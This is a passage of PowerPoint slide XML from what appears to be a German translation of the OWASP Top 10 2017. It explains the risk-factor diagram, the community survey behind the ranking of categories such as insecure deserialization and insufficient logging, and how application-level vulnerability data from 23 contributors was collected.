              <p:cNvPr id="52" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="827" y="1910"/>
                <a:ext cx="144" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683" y="1766"/>
                <a:ext cx="288" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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sz="900" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Angriffs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>vektoren</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRP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bIns="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Auswir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>kung</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="931868" y="1262418"/>
              <a:ext cx="35917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271455"/>
              <a:ext cx="572938" cy="437922"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="36000" tIns="64800" rIns="36000" bIns="10800">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="800" b="1" err="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Bedro-hungs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="8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br>
                <a:rPr lang="en-US" sz="8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800" b="1" err="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quellen</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="8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474207"/>
            <a:ext cx="192106" cy="369311"/>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latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5778500" y="2858141"/>
            <a:ext cx="769582" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="800" b="1" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Geschäftl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 1"/>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+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Details zu den Risiko-Faktoren</a:t>
            </a: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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B246788-8483-43FD-BCB2-20B1833ED144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1846012418"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6854400" cy="8966400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="338727">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Übersicht</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600310">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auf dem OWASP-Project-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Summit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 2017 entschieden sich aktive Teilnehmer und Community-Mitglieder für eine risiko-basierten Reihenfolge mit bis zu zwei vorausschauend</a:t>
                      </a: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t> aufgenommenen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Schwachstellenklassen. Die Reihenfolge wurde teilweise durch quantitative Daten und teilweise durch qualitative Erhebungen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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bestimmt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Rangliste auf Basis der Expertenumfrage in der Community</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770985">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Für die Umfrage haben wir die Schwachstellenkategorien gesammelt, die zuvor als "an der Schwelle" identifiziert oder im Feedback zu 2017 RC1 in der Top 10 Mailingliste erwähnt wurden. Wir haben sie in eine Rangliste aufgenommen und die Befragten gebeten, die vier wichtigsten Schwachstellen zu bewerten, die ihrer Meinung nach in die OWASP Top 10 - 2017 aufgenommen werden sollten. Die Umfrage war vom 2. August bis 18. September 2017 offen. 516 Antworten wurden ausgewertet und die Schwachstellen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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entsprechend geordnet.</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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30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Die Offenlegung privater Informationen ist eindeutig die am höchsten eingestufte Schwachstelle, passt aber sehr gut als zusätzlicher Schwerpunkt in die bestehende</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50" b="1" noProof="0" dirty="0">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rPr>
                        <a:t>A3:2017-Verlust der Vertraulichkeit sensibler Daten</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 Kryptographische Fehler könn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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en ebenfalls </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in</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 diese</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 Kategorie aufgenommen werden. Unsichere Deserialisierung wurde auf Platz drei eingestuft, so dass sie als </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="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A8:2017-Unsichere Deserialisierung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="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in die Top 10 aufgenommen wurde. Das viertplatzierte Thema „User-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Controlled</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 Key</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 ist in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0">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A5:2017-Fehler in der Zugriffskontrolle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="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50" b="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mit enthalten. Es ist gut, dass </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="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es i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>n der Umfrage einen hohen Rang einnimmt, da es bisher noch nicht viele Daten über Autorisierungsschwachstellen gibt.</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 Das auf Platz 5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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gelistete </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Thema ist "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Insufficient</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50" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</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50" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>and</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 Monitoring", passt unserer Meinung nach gut zu den Top 10 und</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 wurde deshalb als </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="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A10:2017-Unzureichendes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0" err="1">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Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="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 &amp; Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> aufgenommen.</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 Wir sind an einem Punkt gelangt, an dem Anwendungen in der Lage sein müssen,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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mögliche Angriffsindizien zu definieren, </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eine geeignete Protokollierung zu erzeugen und</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eine angemessene Alarmierung, Eskalation und Reaktion auszulösen.</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8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1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Öffentlicher Aufruf: Wir brauchen Daten!</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" noProof="0" dirty="0">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44163525"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3578924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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Traditionell wurden bisher eher quantitative Daten gesammelt und analysiert: Wie viele Schwachstellen wurden in getesteten Anwendungen gefunden? Wie bekannt ist, melden Werkzeuge traditionell alle gefundenen Funde einer Schwachstelle. Menschen berichten traditionell über einen einzelnen Befund mit einer Reihe von Beispielen. Dies macht es sehr schwierig, die beiden Berichtsstile auf vergleichbare Weise zu aggregieren.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="de-DE" sz="950" noProof="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE"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 2017 wurde die Häufigkeitsrate anhand der Anzahl der Anwendungen je Datensatz berechnet, die eine oder mehrere Schwachstellen eines bestimmten Typs aufwiesen. Die Daten von vielen größeren Mitwirkenden wurden auf zwei Arten zur Verfügung gestellt. </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Die erste war traditionell die Häufigkeit, bei der jedes gefundene Auftreten einer Schwachstelle gezählt wurde, während die zweite die Anzahl der Anwendungen ist, in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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denen die jeweilige </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Schwachstelle (ein oder mehrere Male) gefunden wurde. Obwohl nicht </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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perfekt, erlaubt uns dies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</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 die Daten von ‚Human </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Assisted</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 Tools‘ (automatisierte Tests) und ‚Tool </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Assisted</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50" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Humans</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 (manuelle Tests) zu vergleichen. Die Rohdaten und Analysearbeiten sind auf </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>GitHub</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hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> verfügbar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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br>
                        <a:rPr lang="de-DE"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de-DE"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Wir beabsichtigen, dies in den zukünftigen Versionen der Top 10 durch einen strukturierteren Ansatz</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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weiter zu verbessern.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="de-DE" sz="950" noProof="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>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Wir haben mehr als 40 Einreichungen für die Datenerhebung erhalten. Da viele von ihnen aus dem ursprünglichen Datenaufruf </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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für den RC1</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stammten, der sich auf die Auftrittshäufigkeit konzentrierte, haben wir die</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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anwendungsbezogenen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>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Daten von 23 Mitwirkenden verwendet, die ~114.000 Anwendungen umfassen. Wo immer möglich, haben wir einen einjährigen Zeitblock von Daten gleicher Anwendungen verwendet. Die Mehrzahl </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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der gemeldeten Anwendungen sind einmal enthalten, obwohl es möglicherweise einige Duble</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tten </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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bei den gemeldeten Anwendungen von </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="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Veracode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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gibt.</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 Die 23 verwendeten Datensätze wurden als </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFC000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>‚</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‚Human </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Assisted</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 Tools‘ bzw. ‚Tool </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Assisted</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50" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Humans</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 klassifiziert. Anomalien in den ausgewählten Daten mit der Häufigkeit von über 100% wurden auf max. 100% angepasst. Um die Auftretungshäufigkeit zu berechnen, haben wir den Prozentsatz all der Anwendungen kalkuliert, bei denen festgestellt wurde, </a:t>
                      </a:r>
                      <a:r>
